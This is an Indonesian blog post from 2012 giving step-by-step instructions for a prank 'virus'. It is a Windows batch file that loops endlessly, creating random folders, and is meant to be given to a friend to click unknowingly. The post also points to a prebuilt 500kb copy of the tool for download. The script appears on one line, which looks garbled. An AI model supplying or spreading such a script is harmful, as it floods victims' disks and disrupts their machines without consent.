Senin, 17 September 2012

Membuat Virus Sederhana


Kepingin kerjain temen gak sob? hehe pada postingan kali ini saya akan share tips dan trik bagaimana cara membuat virus dan tentunya cara ini bisa dilakukan dimana saja karena prosesnya sangat simple dan tidak menggunakan software melainkan dengan menggunakan sebuah Notepad bawaan dari Windows bagaimana tertarik untuk mencobanya? cekidot,,

Ya nggak perlu basa-basi lagi nanti keburu jamuran kalau kebanyakan baca, tapi sebelumnnya baca do'a dulu ya,, xixixi
Cara Membuat 1.000 Folder Dalam Sekejap :

  • Buka Notepad
  • Kemudian ketik kode script berikut :

Kode
@echo off : top md %random% goto top





  • Masukan kode di atas kedalam Notepad
  • Setelah itu klik menu "File" -> "Save As..."
  • Lalu ubah Save as typenya menjadi "All Files"
  • Ketikan nama yang akan disave yang berakhiran ".bat" misalnya (awasadasule.bat) -> Save



  • Hingga file tersebut menjadi seperti ini

  • Apabila temen sobat mnegklik file tersebut, Jreng!! file tersebut akan menggundang banyak folder.
  • Selesai

Masih bingung...? sedot aja tool yang udah jadi disini gan : awasadasule ukuran filenya kecil gan cuman 500kb


Tidak ada komentar:

Poskan Komentar